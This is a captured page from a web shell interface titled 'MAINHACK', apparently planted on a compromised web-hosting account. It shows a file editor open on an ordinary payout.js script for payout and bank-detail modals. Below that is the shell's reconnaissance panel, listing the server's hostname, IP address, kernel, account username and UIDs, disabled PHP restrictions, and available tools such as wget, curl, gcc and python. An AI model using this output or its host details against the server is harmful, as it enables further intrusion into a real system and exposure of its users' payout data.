[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: payout.js
(function ($) { "use strict"; $('body').on('click', '.request-payout', function (e) { e.preventDefault(); Swal.fire({ html: $('#requestPayoutModal').html(), showCancelButton: false, showConfirmButton: false, customClass: { content: 'p-0 text-left', }, width: '40rem', }); }); $('body').on('click', '.js-submit-payout', function (e) { e.preventDefault(); $(this).addClass('loadingbar primary').prop('disabled', true); $(this).closest('form').trigger('submit'); }); function makeHtml(items) { let html = `<div id="payoutDetailsModal"> <h3 class="section-title after-line font-20 text-dark-blue mb-20">${payoutDetailsLang}</h3> <div class="row justify-content-center"> <div class="w-75 js-modal-body">`; for (const item of items) { html += `<div class="d-flex align-items-center justify-content-between text-gray mt-15"> <span class="font-weight-bold">${item.name}</span> <span>${item.value}</span> </div>`; } html += `</div> </div> <div class="mt-3 d-flex align-items-center justify-content-end"> <button type="button" class="btn btn-sm btn-danger close-swl">${closeLang}</button> </div> </div>`; return html; } $('body').on('click', '.js-show-details', function () { const $this = $(this); const $items = $this.closest('tr').find('.js-bank-details'); let data = []; for (const item of $items) { const $item = $(item); data.push({ name: $item.attr('data-name'), value: $item.val(), }) } Swal.fire({ html: makeHtml(data), showCancelButton: false, showConfirmButton: false, customClass: { content: 'p-0 text-left', }, width: '40rem', }); }); })(jQuery);
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285